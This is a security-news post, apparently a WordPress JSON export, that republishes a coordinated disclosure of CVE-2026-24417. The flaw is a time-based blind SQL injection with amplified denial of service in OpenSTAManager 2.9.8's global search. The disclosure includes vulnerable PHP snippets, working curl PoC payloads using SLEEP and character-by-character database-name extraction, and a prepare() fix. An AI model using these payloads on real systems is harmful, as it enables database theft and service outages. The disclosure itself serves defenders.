{"id":46308,"date":"2026-04-13T11:50:34","date_gmt":"2026-04-13T11:50:34","guid":{"rendered":"http:\/\/localhost\/?p=46308"},"modified":"2026-04-13T11:50:34","modified_gmt":"2026-04-13T11:50:34","slug":"openstamanager-298-sql-injection-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46308","title":{"rendered":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:21&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service condition&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218743&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24417&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24417: OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2026-24417](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24417) |\\n    | **Severity** | HIGH |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4hc4-8599-xh2h) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **devcode-it\/openstamanager** (versions: \\u003c 2.9.8)\\n    \\n    \\n    ## CWE Classification\\n    \\n    &#8211; CWE-89: Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)\\n    \\n    ## Details\\n    \\n    ### Summary\\n    \\n    Critical Time-Based Blind SQL Injection vulnerability affecting **multiple search modules** in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with **amplified execution** across 10+ modules.\\n    \\n    **Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\\n    **Vulnerable Parameter:** `term` (GET)\\n    **Affected Endpoint:** `\/ajax_search.php`\\n    **Affected Modules:** Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi\\n    \\n    ### Details\\n    \\n    OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the `term` parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.\\n    \\n    **Vulnerability Chain:**\\n    \\n    1. **Entry Point:** `\/ajax_search.php` (Line 30-31)\\n       &#8220;`php\\n       $term = get(&#8216;term&#8217;);\\n       $term = str_replace(&#8216;\/&#8217;, &#8216;\\\\\\\\\/&#8217;, $term);\\n       &#8220;`\\n       The `$term` parameter undergoes minimal sanitization (only forward slash replacement).\\n    \\n    2. **Distribution:** `\/src\/AJAX.php::search()` (Line 159-161)\\n       &#8220;`php\\n       $files = self::find(&#8216;ajax\/search.php&#8217;);\\n       array_unshift($files, base_dir().&#8217;\/ajax_search.php&#8217;);\\n       foreach ($files as $file) {\\n           $module_results = self::getSearchResults($file, $term);\\n       &#8220;`\\n       The unsanitized `$term` is passed to all module-specific search handlers.\\n    \\n    3. **Execution:** `\/src\/AJAX.php::getSearchResults()` (Line 373)\\n       &#8220;`php\\n       require $file;\\n       &#8220;`\\n       Each module&#8217;s search.php file is included with `$term` variable in scope.\\n    \\n    4. **Vulnerable SQL Queries:** Multiple modules directly concatenate `$term` without `prepare()`\\n    \\n    **All Affected Files (10+ vulnerable instances):**\\n    \\n    1. **`\/modules\/articoli\/ajax\/search.php` &#8211; Line 51** (PRIMARY EXAMPLE)\\n       &#8220;`php\\n       foreach ($fields as $name =\\u003e $value) {\\n           $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       }\\n       $rs = $dbo-\\u003efetchArray($query);\\n       &#8220;`\\n       **Impact:** Direct concatenation without `prepare()`, allows full SQL injection.\\n    \\n    2. **`\/modules\/ordini\/ajax\/search.php` &#8211; Line 43, 47**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       $query .= &#8216;&#8230; WHERE `mg_articoli`.`codice` LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221; OR `mg_articoli_lang`.`title` LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    3. **`\/modules\/ddt\/ajax\/search.php` &#8211; Line 43, 47**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    4. **`\/modules\/fatture\/ajax\/search.php` &#8211; Line 45, 49**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    5. **`\/modules\/preventivi\/ajax\/search.php` &#8211; Line 45, 49**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    6. **`\/modules\/anagrafiche\/ajax\/search.php` &#8211; Line 62, 107, 162**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    7. **`\/modules\/impianti\/ajax\/search.php` &#8211; Line 46**\\n       &#8220;`php\\n       $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n       &#8220;`\\n    \\n    **Properly Sanitized (NOT vulnerable):**\\n    &#8211; `\/modules\/contratti\/ajax\/search.php` &#8211; Uses `prepare()` correctly\\n    &#8211; `\/modules\/automezzi\/ajax\/search.php` &#8211; Uses `prepare()` correctly\\n    \\n    **Note:** The vulnerability has **amplified execution** &#8211; a single malicious request triggers SQL injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to **504 Gateway Time-out** errors as observed on the live demo instance.\\n    \\n    \\u003cimg width=\\&#8221;1899\\&#8221; height=\\&#8221;349\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/a6cc5a75-0f4e-4f49-a750-7ae72a363bbe\\&#8221; \/\\u003e\\n    \\n    ### PoC\\n    \\n    **Step 1: Login**\\n    &#8220;`bash\\n    curl -c \/tmp\/cookies.txt -X POST &#8216;http:\/\/localhost:8081\/index.php?op=login&#8217; \\\\\\n      -d &#8216;username=admin\\u0026password=admin&#8217;\\n    &#8220;`\\n    \\n    **Step 2: Verify Vulnerability (Time-Based SLEEP)**\\n    &#8220;`bash\\n    # Test with SLEEP(1) &#8211; should take ~85+ seconds due to amplified execution\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      &#8216;http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22&#8217;\\n    # Result: real 72.29s\\n    \\n    # Test with SLEEP(0) &#8211; should be fast\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      &#8216;http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22&#8217;\\n    # Result: real 0.30s\\n    &#8220;`\\n    \\n    \\u003cimg width=\\&#8221;727\\&#8221; height=\\&#8221;319\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/6022de5e-de91-4ebb-b02a-30358c31d96d\\&#8221; \/\\u003e\\n    \\n    \\n    **Step 3: Data Extraction &#8211; Database Name**\\n    &#8220;`bash\\n    # Extract first character of database name (expected: &#8216;o&#8217; from &#8216;openstamanager&#8217;)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 170.32s\\n    \\n    # Test with wrong character &#8216;x&#8217; &#8211; should be fast\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m0.30s\\n    &#8220;`\\n    \\n    \\u003cimg width=\\&#8221;1364\\&#8221; height=\\&#8221;349\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/a1d8a7d8-bb1a-49cd-8400-136ae5e359f1\\&#8221; \/\\u003e\\n    \\n    \\n    ### Impact\\n    \\n    **Affected Users:** All authenticated users with access to the global search functionality.\\n    \\n    &#8211; Complete database exfiltration including customer PII, financial records, business secrets\\n    &#8211; Extraction of password hashes for offline cracking\\n    &#8211; Amplified time-based attacks consume 85x server resources per request\\n    \\n    **Recommended Fix:**\\n    \\n    Replace all instances of direct `$term` concatenation with `prepare()`:\\n    \\n    **BEFORE (Vulnerable):**\\n    &#8220;`php\\n    $query .= &#8216; OR &#8216;.$value.&#8217; LIKE \\&#8221;%&#8217;.$term.&#8217;%\\&#8221;&#8216;;\\n    &#8220;`\\n    \\n    **AFTER (Fixed):**\\n    &#8220;`php\\n    $query .= &#8216; OR &#8216;.$value.&#8217; LIKE &#8216;.prepare(&#8216;%&#8217;.$term.&#8217;%&#8217;);\\n    &#8220;`\\n    \\n    **Apply this fix to ALL affected files:**\\n    1. `\/modules\/articoli\/ajax\/search.php` &#8211; Line 51\\n    2. `\/modules\/ordini\/ajax\/search.php` &#8211; Lines 43, 47, 79\\n    3. `\/modules\/ddt\/ajax\/search.php` &#8211; Lines 43, 47, 83\\n    4. `\/modules\/fatture\/ajax\/search.php` &#8211; Lines 45, 49, 85\\n    5. `\/modules\/preventivi\/ajax\/search.php` &#8211; Lines 45, 49, 83\\n    6. `\/modules\/anagrafiche\/ajax\/search.php` &#8211; Lines 62, 107, 162\\n    7. `\/modules\/impianti\/ajax\/search.php` &#8211; Line 46\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4hc4-8599-xh2h\\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24417\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-4hc4-8599-xh2h\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218743&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218743\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:21&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46308","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46308\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:21&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46308\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \\\/ Denial of Service_PACKETSTORM:218743\",\"datePublished\":\"2026-04-13T11:50:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308\"},\"wordCount\":1279,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46308#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308\",\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \\\/ Denial of Service_PACKETSTORM:218743 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46308\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46308#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \\\/ Denial of Service_PACKETSTORM:218743\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46308","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:21&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the search functionality that can lead to a denial of service...","og_url":"https:\/\/zero.redgem.net\/?p=46308","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46308#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46308"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743","datePublished":"2026-04-13T11:50:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46308"},"wordCount":1279,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46308#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46308","url":"https:\/\/zero.redgem.net\/?p=46308","name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46308#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46308"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46308#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection \/ Denial of Service_PACKETSTORM:218743"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46308"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46308\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}